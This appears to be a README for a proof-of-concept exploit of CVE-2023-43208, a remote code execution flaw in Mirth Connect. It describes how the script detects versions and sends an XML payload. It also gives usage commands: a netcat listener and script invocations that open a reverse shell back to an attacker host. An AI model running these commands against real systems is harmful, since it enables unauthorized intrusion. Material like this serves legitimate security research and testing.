## https://sploitus.com/exploit?id=F7C5A207-444B-5194-8BB3-2AAF06E6F105
# CVE-2023-43208 Mirth Connect RCE PoC
Proof-of-concept Python script targeting **CVE-2023-43208** in Mirth Connect.
## Disclaimer
Use only in environments you own or are explicitly authorized to test. This repository is for security research, validation, and defensive testing. The author assumes no responsibility for any misuse or damage caused by this tool.
## Overview
`exp.py` is a minimal-dependency version of [PoC](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) that:
- Detects whether a target appears to be a Mirth Connect instance
- Requests the Mirth Connect version from `/api/server/version`
- Checks whether the version is lower than `4.4.1`
- Sends an XML payload to `/api/users` if the target appears vulnerable
The script defaults to **HTTPS** and can be switched to **HTTP** with `--http`.
## Usage
```bash
python3 exp.py -u -lh -lp [--http]
```
### Arguments
- `-u`, `--url`: Target Mirth Connect URL or host
- `-lh`, `--lhost`: Local host/IP for the reverse connection
- `-lp`, `--lport`: Local listening port
- `--http`: Force HTTP instead of HTTPS (default is HTTPS)
## Example
Start a listener first:
```bash
nc -lvnp 4444
```
Run the script:
```bash
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
```
For an HTTP-only target:
```bash
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
```
## Notes
- SSL certificate verification is disabled in the script.
- The script prompts for confirmation before sending the payload.
- Version detection is based on semantic comparison against `4.4.1`.
- A target that is detected as Mirth Connect is not guaranteed to be exploitable (network, environment, and runtime differences may affect results).
## Credits
- Original vulnerability discovery: IHTeam
- Original code: `K3ysTr0K3R` and `Chocapikk`
- Minimal dependency version: `predyy`